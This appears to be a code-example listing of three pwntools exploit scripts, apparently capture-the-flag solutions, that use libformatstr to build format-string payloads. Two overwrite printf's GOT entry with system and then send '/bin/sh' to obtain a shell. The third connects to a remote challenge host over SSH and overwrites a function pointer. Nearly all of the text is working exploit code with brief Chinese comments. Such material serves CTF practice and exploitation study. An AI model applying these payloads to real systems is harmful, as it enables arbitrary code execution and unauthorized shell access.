Пример #1
0
def pwn_func(io):
	import libformatstr
	e = ELF('./pwn2')
	# 写入printf.got为system
	argnum = 6
	padding = 0
	p = libformatstr.FormatStr()
	p[e.got['printf']]= e.plt['system']
	p[e.got['exit']] = 0x080485EE # main
	fmt_str = p.payload(argnum, padding, start_len=0) # 0 表示之前打印出的字符
	#log.info('payload:\n %s' % hexdump(fmt_str))

	io.sendline(fmt_str)
	io.recv()
	io.sendline('/bin/sh')
	io.recv()
Пример #2
0
io = remote('localhost', 8888)
e = ELF('./pwn2')
#libc = ELF('/lib32/libc.so.6')

# libformatstr应用于格式化串在栈中,使得参数也可控的情况,可以实现任意读写
# 生成pattern串判断参数在格式化串的位置 
#BUF_SZ = 80  # 格式化串的长度
#pat = libformatstr.make_pattern(BUF_SZ)
#io.sendline(pat)
#res = io.recv()
# argnum 表示第argnum个参数位于格式化串首部
# padding 表示使参数对齐需要添加的字节数 0-3
#argnum, padding = libformatstr.guess_argnum(res, BUF_SZ)
#log.info('argnum:%d padding:%d'%(argnum, padding))
# 6, 0

# 写入printf.got为system
argnum = 6
padding = 0
p = libformatstr.FormatStr()
p[e.got['printf']]= e.plt['system']
p[e.got['exit']] = 0x080485EE # main
fmt_str = p.payload(argnum, padding, start_len=0) # 0 表示之前打印出的字符
log.info('payload:\n %s' % hexdump(fmt_str))

io.sendline(fmt_str)
io.recv()
io.sendline('/bin/sh')
io.interactive()

io.interactive()
Пример #3
0
#!/usr/bin/env python3
import libformatstr
from pwn import *

if args.LOCAL:
    io = process(['./ttt'], env={**os.environ, 'TERM': 'xterm'})
    gdb.attach(io, gdbscript='''
b endwin
c
''')
else:
    s = ssh(user='******', host='challenges2.hexionteam.com', port=3004, password='******')
    io = s.shell()
    io.recvuntil('~$')
    io.sendline('TERM=xterm ./ttt')
io.recvuntil('Please enter your name: ')
fmt = libformatstr.FormatStr(isx64=True)
# DIFFICULTY = getchar@0x400e20 (was IMPOSSIBLE@0x401cd5)
fmt[0x603010] = struct.pack('<H', 0x0e20)
# (gdb) b *0x40223e
# (gdb) x/s $rsp + 0x10
# 0x7ffd483d24a0:	"%3608c...
# "Welcome %s!\n"
io.sendline(fmt.payload(arg_index=8, start_len=8))
io.recvuntil('Press ENTER to begin.')
io.sendline()
# Mixed inputs and DIFFICULTY() results.
io.send(''.join(random.choices('wasd ', k=1000)) + 'q')
io.interactive()